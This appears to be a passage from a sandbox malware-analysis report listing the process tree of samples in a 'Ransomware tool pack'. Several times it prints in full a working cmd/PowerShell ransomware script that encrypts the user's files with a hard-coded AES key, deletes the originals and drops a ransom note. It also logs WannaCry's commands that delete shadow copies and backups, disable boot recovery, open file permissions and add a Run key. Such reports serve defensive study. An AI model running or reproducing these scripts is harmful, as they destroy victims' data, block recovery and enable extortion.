  PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c mkdir C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    PID:4472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit
  2⤵
  PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c cd C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1684

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 & echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result = Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-Error $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 & echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi, *.zip, *.rar, *.exe, *.apk, ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText NDgxMmMyZDc5N2IwOTUyNjQ3Y2ZlNGNiZGRkOTMxMGQ= -Suffix '.hacker' -RemoveSource } >> cry.ps1 & echo echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: 7f8f-73d9-d0ae' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:224
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c mkdir C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1412
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c cd C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4672

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\Fud ransomware\hacker\hacker.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & echo [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName='PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 & echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cipher.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$PaddingMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8 >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -LiteralPath $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.GenerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 & echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result = Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-Error $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 & echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi, *.zip, *.rar, *.exe, *.apk, ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText NDgxMmMyZDc5N2IwOTUyNjQ3Y2ZlNGNiZGRkOTMxMGQ= -Suffix '.hacker' -RemoveSource } >> cry.ps1 & echo echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: 7f8f-73d9-d0ae' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c mkdir C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c cd C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher
    3⤵
    - System Location Discovery: System Language Discovery
    PID:880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3192

C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\wannacry.exe
"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\wannacry.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:2384
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2412
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2156
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 301881733158663.bat
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1760
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:4612
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3448
- - C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:4480
- - C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4304
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:1504
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4744
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2260
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hbqpqaznjyrqx231" /t REG_SZ /d "\"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\tasksche.exe\"" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1488
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hbqpqaznjyrqx231" /t REG_SZ /d "\"C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:4060
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:456
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4928
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4112
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:1760
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:1700
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1404
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4284
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2556
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1604
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2728
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4832
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:364
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2192
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4380
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4076
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4956
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1960
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4384
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3664
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:564
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1036
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:388
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2348
- C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\taskse.exe
  taskse.exe C:\Users\Admin\Desktop\Ransomware tool pack\Ransomware tool pack\ransomware virus\wannacry\@[email protected]
  2⤵
  - Executes dropped EXE
